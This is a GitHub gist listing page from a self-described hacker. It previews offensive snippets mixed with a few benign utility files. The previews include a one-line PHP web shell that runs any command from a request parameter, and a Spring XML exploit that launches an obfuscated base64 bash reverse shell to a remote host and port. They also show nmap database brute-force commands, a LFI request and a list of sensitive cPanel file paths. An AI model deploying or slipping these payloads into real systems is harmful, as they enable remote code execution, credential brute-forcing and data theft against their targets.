Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Hacking!

Robbie random-robbie

💭
Hacking!
View GitHub Profile
View cake.txt
https://10fastfingers.com/
http://soccersuck.com/
https://detran.mg.gov.br/
https://www.smart-gsm.com/
http://camvault.xyz/
https://sphere.social/hello/
https://www.sitejabber.com/
https://musiczum.com/
https://schnaeppchenfuchs.com/
https://xatonline.in/
View datatables-lfi
POST /test/DataTables/examples/resources/examples.php HTTP/1.1
Host: 192.168.1.71
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 35
Origin: http://192.168.1.71
View nmap-pwn.md

Mysql Bruteforce

nmap --script=mysql-brute

MS SQL Bruteforce

nmap -p 1433 --script ms-sql-brute

pgsql Bruteforce

nmap -p 5432 --script pgsql-brute

snmp Bruteforce

View fernet.py
#!/usr/bin/env python
from cryptography.fernet import Fernet
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--fernet", required=True,help="Fernet Key")
parser.add_argument("-v", "--val", required=True,help="Value to decode")
args = parser.parse_args()
View logstash.conf
input {
file {
type => "app"
path => ["/home/u/archives/urlteam_2021-02-27-21-17-02/goo-gl/______.txt"]
start_position => "beginning"
sincedb_path => "/dev/null"
}
}
View cpanel.txt
/$USER_wrdp1.sql
/$USER_wpdb.sql
/home/$USER/mail/dovecot-uidlist
/var/spool/exim/input/i/1lE8Ii-0006Gf-LV-D
/var/log/cpanel-install.log
/var/log/exim_mainlog
/var/log/mysqld.log
/var/log/cron
/var/log/maillog
/var/log/exim_mainlog-20210221.gz
View shell.php
<?php
system($_REQUEST['cmd']);
?>
View phpobject.php
<?php
/*
Plugin Name: PHP Object Injection Test
Plugin URI: https://www.pluginvulnerabilities.com/
Description: Allows for easy testing of PHP object injection vulnerabilities. Displays message "PHP object injection has occurred." when "O:20:"PHP_Object_Injection":0:{}" is unserialized.
Version: 1.0
Author: White Fir Design
Author URI: https://www.pluginvulnerabilities.com/
License: GPLv2
View exploit.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTMwLzQ0NDQgMD4mMQ== | base64 -d | bash]]></value>
View wp-scan.md
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

 WordPress Security Scanner by the WPScan Team